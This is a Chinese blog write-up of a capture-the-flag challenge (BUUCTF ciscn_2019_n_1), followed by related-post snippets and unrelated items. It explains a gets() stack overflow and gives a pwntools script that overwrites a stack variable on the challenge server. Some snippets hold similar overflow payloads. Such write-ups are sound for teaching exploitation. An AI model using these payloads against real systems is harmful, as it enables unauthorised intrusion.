buuctf pwn04

曾经满眼皆是她

于 2023-10-21 00:03:00 发布

阅读量52

点赞数

文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_74861133/article/details/133955669

版权

buuctf pwn04 ciscn_2019_n_1 1

1.checksec
在这里插入图片描述
2.ida后进入main函数发现可疑函数func（），点进去查看

v1定义为44个字节，gets（v1）存在栈溢出，可以利用
如果 v2 等于 11.28125 就可以拿到flag
v1在rbp-30h的位置，v2在rbp-4h的位置，溢出以后我们就可以用自己的数据覆盖v2。
11.28125在内存中的16进制表示为0x41348000
在这里插入图片描述
故exp如下：

from pwn import*
p=remote('node4.buuoj.cn',29055)
payload=b'a'*44+p64(0x41348000)
p.sendlineafter("Let's guess the number.",payload)
p.interactive()

运行脚本如下，得到flag
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

曾经满眼皆是她

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUUCTF PWN rip1 WP

m0_54262894的博客

07-31

2583

BUUCTF PWN rip 1 这是一个WP，也是一个自己练习过程的记录。先把文件放入pwn机中检查一下，发现并没有开启保护，所以应该是一道简单题我们运行一下试试，它让你输入一段字符然后将字符输出。把文件放在ida中查看一下发现main函数并不复杂，只是定义了一个 s ，而且我们很容易就能找到栈溢出的点，我们都知道gets函数是一个危险函数，对于我们来说它可以接受到无限的字符，所以这里就是我们要pwn掉的点。我们双击 s ，看它有多少空...

buuctf pwn解题

2301_80477504的博客

02-01

522

1 条评论您还未登录，请先登录后发表或查看评论

BUUCTF PWN-RIP详解

weixin_43780092的博客

09-07

5187

BUU CTF PWN 入门知识详解

BUUCTF PWN（2）

qq_60794823的博客

09-28

243

首先先用checksec查看开启了什么保护可以看到只开启了NX保护，即堆栈不可执行用32位的IDA打开附件，shift+f12查看字串打开main函数查看vuln函数，发现存在栈溢出漏洞的函数，**fgets(s, 32, edata)**这里对gets作出了限制，32（0x20）而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗，结果肯定不是这样的仔细查看C代码可以发现，函数实现了字符串替换，将I替换为you，并将结果重组赋值给s。

buuctf pwn入门1

weixin_63231007的博客

07-07

1378

buuctf pwn 前几道简单栈溢出&格式化字符串漏洞

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1319

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

BUUCTF pwn

L0g1c的博客

01-30

1679

第一道：第一步：连接nc靶场第二步：连接靶场后，执行 ls 命令，展示该靶场下目录文件。第三步：里有个 flag文件使用 cat命令进行查看。得到flag

BUUCTF PWN（1）

qq_60794823的博客

09-27

1045

首先checksec起手发现没有打开任何防护，是64位amd文件，使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞，没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload：‘a’ * 0x23 + p64(0x401186)发现连接超时。

BUUCTF pwn——pwn2_sctf_2016

CNS-Enterprise BCC-1701-J

04-18

359

BUUCTF 做题练习

buuctf pwn ubuntu20的自己搭建运行环境

11-15

pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334

BUUCTF PWN-堆题总结 2021-09-27

m0_56897090的博客

09-27

2092

文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019

BUUCTF pwn rip

weixin_55190422的博客

11-03

341

现在开始是记录我个人对BUU上PWN题的刷题记录。首先是一个ELF文件，放到Linux里面来看。首先老套路checksec一下接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段我们发现里面有个系统调用函数。我们查看下汇编代码我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数所以payload: from pwn import * p = remote('node4.buuoj.cn',...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8489

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

基于龙伯格（Luenberger）观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型

10-06

基于龙伯格（Luenberger）观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型通过龙伯格观测器，我们可以在不直接测量转子角度的情况下，通过已知的电机电流、电压来估算转子角度。这种方法在控制理论和实际电机控制中具有广泛的应用，尤其是在无传感器的情况下。

10-06

10-06

阵列天线泰勒综合法降低副瓣电平的matlab源代码

10-06

clear clc % 参数设置 Freq =30*(1e9); %频率 v_0=3*10^8;%光速 lamda = v_0/Freq ; % 波长 d = lamda * 0.6; % d为阵元间距 theta0 = (90/180)*pi; % 扫描角度 theta = 0: 0.01 : pi; % Θ为方向角 u = pi*d*(cos(theta)-cos(theta0))/lamda; %T = Chebyshev; % T为切比雪夫恒等式系数矩阵 N = 16; % N为直线阵的阵元数量，M为一侧的单元数(对称) R0dB = 20; % R0dB为副瓣电平 nbar=9; %相等电平副瓣数目 if (mod(N,2)==0) M = N / 2; parity = 0; % parity为奇偶性，0为偶数

Delphi 开发资源汇总及组件介绍

10-06

内容概要：本文档提供了一个归档快照，展示了一个精心策划的Delphi优秀框架、库与各种资源列表。其中包括大量通用库如JCL、JVCL、Spring4D以及Alcinoe等，针对多媒体（如音频视频）、网络通信工具集（如Indy、Synapse）以及界面控制包等多个模块的具体介绍。另外还涉及到脚本引擎（如DWScript）、内存管理、日志记录、加密解密技术等多项实用性组件及实用工具。此外它还有针对性地罗列了关于数据库连接库（例如ZeosLib、mORMot），单元测试库（像DUnitX，DUnit2等），以及各类IDE插件增强工具的细节描述。适合人群：Delphi程序员及其开发者。使用场景及目标：作为查找和选择适用于不同软件项目的Delphi第三方库、组件及其他辅助工具的参考书，为Delphi开发人员提高工作效率和扩展程序功能提供了有力的支持。其他说明：该资料侧重于开源项目，且对已过时多年的旧工程保持较低的关注度。所有的进展和改进都会在其活跃维护的新版本Awesome-Pascal清单上进行。